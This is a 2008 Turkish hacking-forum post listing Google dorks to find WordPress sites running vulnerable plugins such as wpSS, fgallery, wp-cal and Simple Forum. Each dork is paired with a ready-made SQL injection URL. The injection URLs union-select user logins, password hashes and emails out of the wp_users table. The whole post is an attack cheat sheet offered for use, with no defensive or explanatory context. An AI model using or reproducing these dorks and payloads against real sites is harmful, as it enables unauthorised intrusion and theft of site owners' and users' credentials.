XabrkX Admin
Mesaj Sayısı : 573 Nerden : NOLDU BİZEMİ GELCEN ? :D :D Lakap : ******kaRİZma******* RUH HALİ : SADECE BU KONUDA AŞAĞIDAKİ KADAR TEŞEKKÜR EDİLDİ : <div class="js-kit-rating" view="score"path="" title="" permalink=""></div><script src="http://js-kit.com/ratings.js"></script> TAKIM : Kayıt tarihi : 09/07/08
| Konu: Wordpress sql injection açıkları Çarş. Eyl. 03, 2008 3:33 pm | |
| Wordpress sql injection açıkları Dork : inurl:/wp-content/plugins/wpSS/
/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,conca t(user_login,0x3a,user_pass,0x3a,user_email),3,4+f rom+wp_users--&display=plain
Dork: inurl:"wp-download.php?dl_id="
/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
DORK 1 : allinurl: page_id album "photo"
/?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
DORKS 1 :
Simple Forum - Version 2.0 (Build 207) Simple Forum - Sürüm 2.1 (Build 228) Simple Forum - Version 2.1 (Build 236)
DORK 2 : allinurl: "sf-forum?forum"
sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
Dork : inurl:/wp-content/plugins/fgallery/
/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--
Dorks : inurl:/wp-content/plugins/wp-cal/ inurl:/WP-Cal/
/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
google: Fredrik Fahlstad. Version: 1.7.4.
/?page_id=115&forumaction=showprofile&user=1+union+ select+null,concat(user_login,0x2f,user_pass,0x2f, user_email),null,null,null,null,null+from+wp_tbv_u sers/* | |
|